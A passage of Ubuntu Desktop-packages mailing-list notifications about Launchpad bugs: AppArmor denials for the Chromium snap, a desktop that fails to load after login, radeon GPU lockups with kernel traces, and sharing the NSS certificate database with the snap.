proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:20:58 millbarge bash[4126190]: Fri, 21 Feb 2020 00:20:58 + src 46 (fix: 3) currently receiving: 0,1@0 0,13@0 0,15@0 0,17@0 0,19@0 0,24@0 0,30@0 1,133@0 1,138@0 2,1@1 2,9@1 2,18@1 2,21@1 2,26@1 3,23@0 3,27@0 3,28@0 Feb 21 00:21:05 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:05 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:21:05 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:21:05 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:21:15 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:15 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
$ aa-decode 2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C Decoded: /home/sarnold/snap/chromium/1026/.config/chromium/Default/Sync Data/SyncData.sqlite3-journal This sounds like perhaps the snap was refreshed while it was running. If so, it should be fixed with refresh-app-awareness in snapd, which is actively being worked on. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1864127 Title: apparmor denies ~/snap/chromium/ writes Status in chromium-browser package in Ubuntu: New Bug description: Hello, on focal with chromium from the snap package running I see a constant stream of apparmor denials: Feb 21 00:20:55 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:20:55 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:20:55 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:20:58 millbarge bash[4126190]: Fri, 21 Feb 2020 00:20:58 + src 46 (fix: 3) currently receiving: 0,1@0 0,13@0 0,15@0 0,17@0 0,19@0 0,24@0 0,30@0 1,133@0 1,138@0 2,1@1 2,9@1 2,18@1 2,21@1 2,26@1 3,23@0 3,27@0 3,28@0 Feb 21 00:21:05 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:21:05 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:21:05 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:21:05 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:21:05 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265 Feb 21 00:21:15 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium"
[Desktop-packages] [Bug 1285444] Re: Login Successful, Desktop Never Loads
Running into this issue on 19.10, so none of the unity-specific solutions work. If I switch TTY with ctrl+alt+F1, after I try to log back in and just see the desktop background, I'm brought to login screen again, but this time log in is successful. Disabling all gnome extensions doesn't seem to help. Happens every time after suspending laptop. Not sure if this is helpful or relevant, but I tried looking at the following logs: % journalctl -e /usr/bin/gnome-shell Feb 16 12:15:05 tula-Z gnome-shell[2114]: JS WARNING: [resource:///org/gnome/gjs/modules/signals.js 135]: Too many arguments to method Clutter.Actor.destroy: expected 0, got Feb 16 12:15:05 tula-Z gnome-shell[2114]: JS WARNING: [resource:///org/gnome/gjs/modules/signals.js 135]: Too many arguments to method Clutter.Actor.destroy: expected 0, got Feb 16 12:15:15 tula-Z gnome-shell[2114]: An active wireless connection, in infrastructure mode, involves no access point? Feb 16 12:15:15 tula-Z gnome-shell[2114]: An active wireless connection, in infrastructure mode, involves no access point? Feb 16 12:15:26 tula-Z gnome-shell[8675]: Failed to obtain high priority context Feb 16 12:15:26 tula-Z gnome-shell[8675]: Failed to obtain high priority context Feb 16 12:15:27 tula-Z gnome-shell[8675]: Unset XDG_SESSION_ID, getCurrentSessionProxy() called outside a user session. Asking logind directly. Feb 16 12:15:27 tula-Z gnome-shell[8675]: Will monitor session c3 Feb 16 12:15:27 tula-Z gnome-shell[8675]: Getting invalid resource scale property Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_hello: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: Error while sending AddMatch() message: The connection is closed Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: Getting invalid resource scale property Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_hello: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: Error while sending AddMatch() message: The connection is closed Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:28 tula-Z gnome-shell[8675]: Error looking up permission: GDBus.Error:org.freedesktop.portal.Error.NotFound: No entry for geolocation Feb 16 12:15:28 tula-Z gnome-shell[8675]: JS WARNING: [resource:///org/gnome/shell/ui/windowManager.js 1640]: reference to undefined property "MetaWindowXwayland" Feb 16 12:15:27 tula-Z gnome-shell[8675]: ibus_bus_call_async: assertion 'ibus_bus_is_connected (bus)' failed Feb 16 12:15:28 tula-Z gnome-shell[8675]: Error looking up permission: GDBus.Error:org.freedesktop.portal.Error.NotFound: No entry for geolocation Feb 16 12:15:28 tula-Z gnome-shell[8675]: JS WARNING: [resource:///org/gnome/shell/ui/windowManager.js 1640]: reference to undefined property "MetaWindowXwayland" Feb 16 12:15:28 tula-Z gnome-shell[8675]: Registering session with GDM Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-DEBUG] Registering StatusNotifierItem :1.180/org/ayatana/NotificationItem/software_update_available Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-DEBUG] Registering StatusNotifierItem :1.90/org/ayatana/NotificationItem/dropbox_client_2433 Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Feb 16 12:15:34 tula-Z gnome-shell[2114]: [AppIndicatorSupport-FATAL] unable to update overlay icon Hope this is helpful! -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to at-spi2-core in Ubuntu. https://bugs.launchpad.net/bugs/1285444 Title: Login Successful, Desktop Never Loads Status in at-spi2-core package in Ubuntu: Triaged Bug description: Here is what I encounter 1. Boot computer, boot proceeds normally 2. Reach standard Ubuntu login screen, nothing seems to be amiss 3. Enter user name and password 4. Login disappears, just see the pink "Ubuntu 14.04" background The desktop never loads, not even after ~30 minutes. The launcher never appears, and the Desktop background never changes to the user- configured background. Other features: * Cursor works fine, it can be moved around the screen * No error messages pop up * ALT+F1 etc. can be used to switch to different TTYs; all files on the system appear to be intact * Print screen button works (I will upload a screen shot when I get a chance to copy it onto a USB drive) * Hitting power button pops up a window prompting the
[Desktop-packages] [Bug 1863390] [NEW] GPU lockup ring 0 stalled for more than X msec
Public bug reported: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring 0 stalled for more than 24040msec radeon :01:00.0: GPU lockup (current fence id 0x9e44 last fence id 0x9e49 on ring 0) I sometimes get a few GPU soft reset which seem to fail in drm(?): radeon :01:00.0: Saved 110839 dwords of commands on ring 0. radeon :01:00.0: GPU softreset: 0x0008 ... radeon :01:00.0: Wait for MC idle timedout ! radeon :01:00.0: Wait for MC idle timedout ! [drm] PCIE GART of 1024M enabled (table at 0x00162000). radeon :01:00.0: WB enabled radeon :01:00.0: fence driver on ring 0 use gpu addr 0x4c00 and cpu addr 0x725651ad radeon :01:00.0: fence driver on ring 3 use gpu addr 0x4c0c and cpu addr 0xc3678ed8 radeon :01:00.0: fence driver on ring 5 use gpu addr 0x00072118 and cpu addr 0xdbd9e01b [drm:r600_ring_test [radeon]] *ERROR* radeon: ring 0 test failed (scratch(0x8504)=0xCAFEDEAD) [drm:evergreen_resume [radeon]] *ERROR* evergreen startup failed on resume Even if the above reset doesn't happen, this freeze always results in a unable to handle page fault" BUG in radeon_ring_backup, entered from various call paths, eg: BUG: unable to handle page fault for address: bc2d80574ffc ... Oops: [#1] SMP PTI CPU: 2 PID: 11243 Comm: kworker/2:1H Not tainted 5.5.0-050500-generic #202001262030 Workqueue: radeon-crtc radeon_flip_work_func [radeon] RIP: 0010:radeon_ring_backup+0xc9/0x140 [radeon] Call Trace: radeon_gpu_reset+0xc3/0x2f0 [radeon] radeon_flip_work_func+0x1f3/0x250 [radeon] ? __schedule+0x2e0/0x760 process_one_work+0x1b5/0x370 worker_thread+0x50/0x3d0 kthread+0x104/0x140 ? process_one_work+0x370/0x370 ? kthread_park+0x90/0x90 ret_from_fork+0x35/0x40 or: BUG: unable to handle page fault for address: c03901000ffc ... Oops: [#1] SMP PTI CPU: 3 PID: 2227 Comm: compton Not tainted 5.3.0-28-generic #30~18.04.1-Ubuntu RIP: 0010:radeon_ring_backup+0xd3/0x140 [radeon] Call Trace: radeon_gpu_reset+0xb9/0x340 [radeon] ? dma_fence_wait_timeout+0x48/0x110 ? reservation_object_wait_timeout_rcu+0x19d/0x340 radeon_gem_handle_lockup.part.4+0xe/0x20 [radeon] radeon_gem_wait_idle_ioctl+0xa6/0x110 [radeon] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] drm_ioctl_kernel+0xb0/0x100 [drm] drm_ioctl+0x389/0x450 [drm] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 radeon_drm_ioctl+0x4f/0x80 [radeon] do_vfs_ioctl+0xa9/0x640 ? __schedule+0x2b0/0x670 ksys_ioctl+0x75/0x80 __x64_sys_ioctl+0x1a/0x20 do_syscall_64+0x5a/0x130 entry_SYSCALL_64_after_hwframe+0x44/0xa9 I've tried both 5.3.0-28-generic and 5.5.0-050500-generic from kernel- ppa but that made no difference. It appears to be a bug in radeon. Nothing specific makes this happen, just regular usage with a compositing window manager. I'm not playing games or particularly exercising the GPU. The last two times I was just reading in web browser. It's also happened in the middle of the night while I was asleep. Sometimes I have a few days uptime, sometimes it happens in less than 24 hours from boot. This never happened before the radeon update mentioned on the first line. I'll attach two files of dmesg output. As per https://wiki.ubuntu.com/X/Troubleshooting/Freeze I've installed and started apport for next time it happens. ** Affects: xserver-xorg-video-ati (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1863390 Title: GPU lockup ring 0 stalled for more than X msec Status in xserver-xorg-video-ati package in Ubuntu: New Bug description: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring
[Desktop-packages] [Bug 1863390] Re: GPU lockup ring 0 stalled for more than X msec
** Attachment added: "dmesg-2020-02-14.txt" https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+attachment/5328273/+files/dmesg-2020-02-14.txt -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1863390 Title: GPU lockup ring 0 stalled for more than X msec Status in xserver-xorg-video-ati package in Ubuntu: New Bug description: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring 0 stalled for more than 24040msec radeon :01:00.0: GPU lockup (current fence id 0x9e44 last fence id 0x9e49 on ring 0) I sometimes get a few GPU soft reset which seem to fail in drm(?): radeon :01:00.0: Saved 110839 dwords of commands on ring 0. radeon :01:00.0: GPU softreset: 0x0008 ... radeon :01:00.0: Wait for MC idle timedout ! radeon :01:00.0: Wait for MC idle timedout ! [drm] PCIE GART of 1024M enabled (table at 0x00162000). radeon :01:00.0: WB enabled radeon :01:00.0: fence driver on ring 0 use gpu addr 0x4c00 and cpu addr 0x725651ad radeon :01:00.0: fence driver on ring 3 use gpu addr 0x4c0c and cpu addr 0xc3678ed8 radeon :01:00.0: fence driver on ring 5 use gpu addr 0x00072118 and cpu addr 0xdbd9e01b [drm:r600_ring_test [radeon]] *ERROR* radeon: ring 0 test failed (scratch(0x8504)=0xCAFEDEAD) [drm:evergreen_resume [radeon]] *ERROR* evergreen startup failed on resume Even if the above reset doesn't happen, this freeze always results in a unable to handle page fault" BUG in radeon_ring_backup, entered from various call paths, eg: BUG: unable to handle page fault for address: bc2d80574ffc ... Oops: [#1] SMP PTI CPU: 2 PID: 11243 Comm: kworker/2:1H Not tainted 5.5.0-050500-generic #202001262030 Workqueue: radeon-crtc radeon_flip_work_func [radeon] RIP: 0010:radeon_ring_backup+0xc9/0x140 [radeon] Call Trace: radeon_gpu_reset+0xc3/0x2f0 [radeon] radeon_flip_work_func+0x1f3/0x250 [radeon] ? __schedule+0x2e0/0x760 process_one_work+0x1b5/0x370 worker_thread+0x50/0x3d0 kthread+0x104/0x140 ? process_one_work+0x370/0x370 ? kthread_park+0x90/0x90 ret_from_fork+0x35/0x40 or: BUG: unable to handle page fault for address: c03901000ffc ... Oops: [#1] SMP PTI CPU: 3 PID: 2227 Comm: compton Not tainted 5.3.0-28-generic #30~18.04.1-Ubuntu RIP: 0010:radeon_ring_backup+0xd3/0x140 [radeon] Call Trace: radeon_gpu_reset+0xb9/0x340 [radeon] ? dma_fence_wait_timeout+0x48/0x110 ? reservation_object_wait_timeout_rcu+0x19d/0x340 radeon_gem_handle_lockup.part.4+0xe/0x20 [radeon] radeon_gem_wait_idle_ioctl+0xa6/0x110 [radeon] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] drm_ioctl_kernel+0xb0/0x100 [drm] drm_ioctl+0x389/0x450 [drm] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 radeon_drm_ioctl+0x4f/0x80 [radeon] do_vfs_ioctl+0xa9/0x640 ? __schedule+0x2b0/0x670 ksys_ioctl+0x75/0x80 __x64_sys_ioctl+0x1a/0x20 do_syscall_64+0x5a/0x130 entry_SYSCALL_64_after_hwframe+0x44/0xa9 I've tried both 5.3.0-28-generic and 5.5.0-050500-generic from kernel- ppa but that made no difference. It appears to be a bug in radeon. Nothing specific makes this happen, just regular usage with a compositing window manager. I'm not playing games or particularly exercising the GPU. The last two times I was just reading in web browser. It's also happened in the middle of the night while I was asleep. Sometimes I have a few days uptime, sometimes it happens in less than 24 hours from boot. This never happened before the radeon update mentioned on the first line. I'll attach two files of dmesg output. As per https://wiki.ubuntu.com/X/Troubleshooting/Freeze I've installed and started apport for next time it happens. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe :
[Desktop-packages] [Bug 1863390] Re: GPU lockup ring 0 stalled for more than X msec
** Attachment added: "dmesg-2020-02-15.txt" https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+attachment/5328274/+files/dmesg-2020-02-15.txt -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1863390 Title: GPU lockup ring 0 stalled for more than X msec Status in xserver-xorg-video-ati package in Ubuntu: New Bug description: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring 0 stalled for more than 24040msec radeon :01:00.0: GPU lockup (current fence id 0x9e44 last fence id 0x9e49 on ring 0) I sometimes get a few GPU soft reset which seem to fail in drm(?): radeon :01:00.0: Saved 110839 dwords of commands on ring 0. radeon :01:00.0: GPU softreset: 0x0008 ... radeon :01:00.0: Wait for MC idle timedout ! radeon :01:00.0: Wait for MC idle timedout ! [drm] PCIE GART of 1024M enabled (table at 0x00162000). radeon :01:00.0: WB enabled radeon :01:00.0: fence driver on ring 0 use gpu addr 0x4c00 and cpu addr 0x725651ad radeon :01:00.0: fence driver on ring 3 use gpu addr 0x4c0c and cpu addr 0xc3678ed8 radeon :01:00.0: fence driver on ring 5 use gpu addr 0x00072118 and cpu addr 0xdbd9e01b [drm:r600_ring_test [radeon]] *ERROR* radeon: ring 0 test failed (scratch(0x8504)=0xCAFEDEAD) [drm:evergreen_resume [radeon]] *ERROR* evergreen startup failed on resume Even if the above reset doesn't happen, this freeze always results in a unable to handle page fault" BUG in radeon_ring_backup, entered from various call paths, eg: BUG: unable to handle page fault for address: bc2d80574ffc ... Oops: [#1] SMP PTI CPU: 2 PID: 11243 Comm: kworker/2:1H Not tainted 5.5.0-050500-generic #202001262030 Workqueue: radeon-crtc radeon_flip_work_func [radeon] RIP: 0010:radeon_ring_backup+0xc9/0x140 [radeon] Call Trace: radeon_gpu_reset+0xc3/0x2f0 [radeon] radeon_flip_work_func+0x1f3/0x250 [radeon] ? __schedule+0x2e0/0x760 process_one_work+0x1b5/0x370 worker_thread+0x50/0x3d0 kthread+0x104/0x140 ? process_one_work+0x370/0x370 ? kthread_park+0x90/0x90 ret_from_fork+0x35/0x40 or: BUG: unable to handle page fault for address: c03901000ffc ... Oops: [#1] SMP PTI CPU: 3 PID: 2227 Comm: compton Not tainted 5.3.0-28-generic #30~18.04.1-Ubuntu RIP: 0010:radeon_ring_backup+0xd3/0x140 [radeon] Call Trace: radeon_gpu_reset+0xb9/0x340 [radeon] ? dma_fence_wait_timeout+0x48/0x110 ? reservation_object_wait_timeout_rcu+0x19d/0x340 radeon_gem_handle_lockup.part.4+0xe/0x20 [radeon] radeon_gem_wait_idle_ioctl+0xa6/0x110 [radeon] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] drm_ioctl_kernel+0xb0/0x100 [drm] drm_ioctl+0x389/0x450 [drm] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 radeon_drm_ioctl+0x4f/0x80 [radeon] do_vfs_ioctl+0xa9/0x640 ? __schedule+0x2b0/0x670 ksys_ioctl+0x75/0x80 __x64_sys_ioctl+0x1a/0x20 do_syscall_64+0x5a/0x130 entry_SYSCALL_64_after_hwframe+0x44/0xa9 I've tried both 5.3.0-28-generic and 5.5.0-050500-generic from kernel- ppa but that made no difference. It appears to be a bug in radeon. Nothing specific makes this happen, just regular usage with a compositing window manager. I'm not playing games or particularly exercising the GPU. The last two times I was just reading in web browser. It's also happened in the middle of the night while I was asleep. Sometimes I have a few days uptime, sometimes it happens in less than 24 hours from boot. This never happened before the radeon update mentioned on the first line. I'll attach two files of dmesg output. As per https://wiki.ubuntu.com/X/Troubleshooting/Freeze I've installed and started apport for next time it happens. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe :
[Desktop-packages] [Bug 1859643] Re: [snap] cannot use shared NSS db
OTOH, I think it makes sense to allow for the ability to share ~/.pki/nssdb (and yes, a personal-files addition along with a snap change (perhaps just a symlink from $SNAP_USER_DATA/.pki/nssdb to ~/.pki/nssdb would be enough rather than patching?). For read access, I have no problem with using personal-files to read the nssdb into $SNAP_USER_DATA, with auto-connection. For write, chromium is not the clear owner of this directory, so I would be hesitant to recommend it as a default since IMO, chromium shouldn't be writing out to these files even in non-snap situations (again, perfectly reasonable to merge in changes if the user desires). I for one would be rather surprised to install a certificate via chromium and have it reflected in my session-wide nssdb for another application (eg, libvirt). Furthermore, there is nothing saying that nssdb might not change format incompatibly with nss in the chromium snap and software installed on the system. This is not theoretical: rather than using a single nssdb in the user's global ~/.pki/nssdb dir, firefox, for example, instead stores per-profile certN.db files in ~/.mozilla/firefox//* and in my profile dirs I have a mixture of cert8.db and cert9.db. I do see that chromium only has cert9.db, so perhaps this is handled by the library itself (again, someone would need to verify), but then there is nssdb skew if some applications are writing to certN-1.db, some to certN.db and others to certN+1.db. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1859643 Title: [snap] cannot use shared NSS db Status in chromium-browser package in Ubuntu: Triaged Bug description: (initially reported at https://askubuntu.com/questions/1202861 /chromium-does-not-show-certificates-from-pki-nssdb) Chromium can theoretically use the shared NSS db at ~/.pki/nssdb, but the snap confinement prevents it from actually using the shared db (it reads and writes to $SNAP/.pki/nssdb instead). Shared certificates can be inspected by browsing to chrome://settings/certificates. Really accessing the shared db would require an additional read/write personal-files plug on $HOME/.pki/nssdb, and patching GetDefaultConfigDirectory() in crypto/nss_util.cc. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1859643/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1860282] Re: corrupted desktop tooltips
